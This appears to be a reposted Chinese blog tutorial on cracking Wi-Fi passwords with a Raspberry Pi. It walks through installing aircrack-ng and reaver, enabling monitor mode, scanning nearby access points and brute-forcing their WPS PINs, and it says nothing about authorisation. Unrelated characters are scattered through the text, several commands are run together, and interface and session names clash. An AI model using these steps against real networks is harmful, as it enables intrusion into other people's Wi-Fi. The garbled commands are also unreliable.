本文非原創(chuàng)甩栈,博主 以前對 無線破解深有研究...當然類似本文的文章产捞,網(wǎng)上有相關疗隶,可自行百度...
工具:
樹莓派一只
可以SSH連接樹莓派的手機或電腦
USB無線網(wǎng)卡(可選,推薦使用8187或3070大功率免驅(qū)無線網(wǎng)卡)
==本次采用的系統(tǒng)為樹莓派官方鏡像旭旭,配合aircrack-ng與reaver進行無線局域網(wǎng)滲透測試==
目前比較有效的破解方式有兩種盖彭,即pin碼方式和抓包方式咧叭,http://www.freebuf.com/articles/wireless/58342.html
pin碼方式:
sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion
下載并安裝aircrack-ng:
wget http://7xr6zv.com1.z0.glb.clouddn.com/aircrack-ng-1.2-rc4.tar.gz
cd aircrack-ng-1.2-rc4
make && sudo make install
下載并安裝reaver:
wget http://7xr6zv.com1.z0.glb.clouddn.com/reaver-1.4.tar.gztar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src./configure
make && sudo make install
著作權(quán)歸作者所有蚀乔。
由于樹莓派性能有限,編譯安裝過程會有些慢菲茬,請耐心等待吉挣。安裝完成后,執(zhí)行airmon-ng,reaver命令檢查是否安裝成功婉弹。注意:安裝完成并不代表安裝成功睬魂,如果執(zhí)行上述命令報錯,查看镀赌,請用sudo apt-get命令安裝執(zhí)行命令所需的依賴包(因人而異)安裝成功后氯哮,執(zhí)行上述命令后結(jié)果如下:
?查看無線網(wǎng)卡
sudo ifconfig
這里我用型號為樹莓派3B,其中wlan0為內(nèi)置無線網(wǎng)卡商佛,wlan1為外接USB無線網(wǎng)卡8187注意
1. 如果你使用的設備為樹莓派2代+USB網(wǎng)卡喉钢,你將只看到wlan0,如果沒有顯示任何無線網(wǎng)卡設備威彰,請自行加載驅(qū)動(這里強烈推薦使用免驅(qū)網(wǎng)卡
2. 如果你使用的是樹莓派3代且沒有外接無線網(wǎng)卡浦译,請使用有線連接,否則下一步操作將直接中斷SSH連接而無法控制樹莓派
開啟網(wǎng)卡監(jiān)聽模式(mon)
sudo airmon-ng start wlanX #注意這個X因人而異
查看監(jiān)聽模式下網(wǎng)卡的名稱
sudo ifconfig
重新執(zhí)行ifconfig命令 這時可以看到wlan1變?yōu)閣lan1mon(這里的wlan1mon因人而異)
啟用rever暴力破解掛機破解pin碼
sudo apt-get install -y screen #安裝screen
screen -S wps #創(chuàng)建一個新窗口
sudo airodump-ng wlan1mon #掃描附近AP的信息刀疙,wlan1mon為監(jiān)聽模式下的新名稱
這時屏幕會動態(tài)顯示附近AP的信息魏滚,按ctrl+c停止掃描
選擇一個信號強而且開了wps功能的AP(查看方式很簡單,掃描結(jié)果MB下面的54e后面如果有個小點,就說明開啟了wps功能)
sudo reaver -i mon0 -b 12:34:56:78:90:ab -a -S -vv -d2 -t 5 -c 11
接下來就是漫長的等待了伯复,由于開了screen慨代,可以斷開SSH而繼續(xù)破解,可以用screen -r wpa恢復破解回話啸如,如果顯示會話Attach侍匙,請嘗試使用screen -Dr 會話ID進行恢復
本文參考: https://www.sfantree.com/pi-hack-wifi/
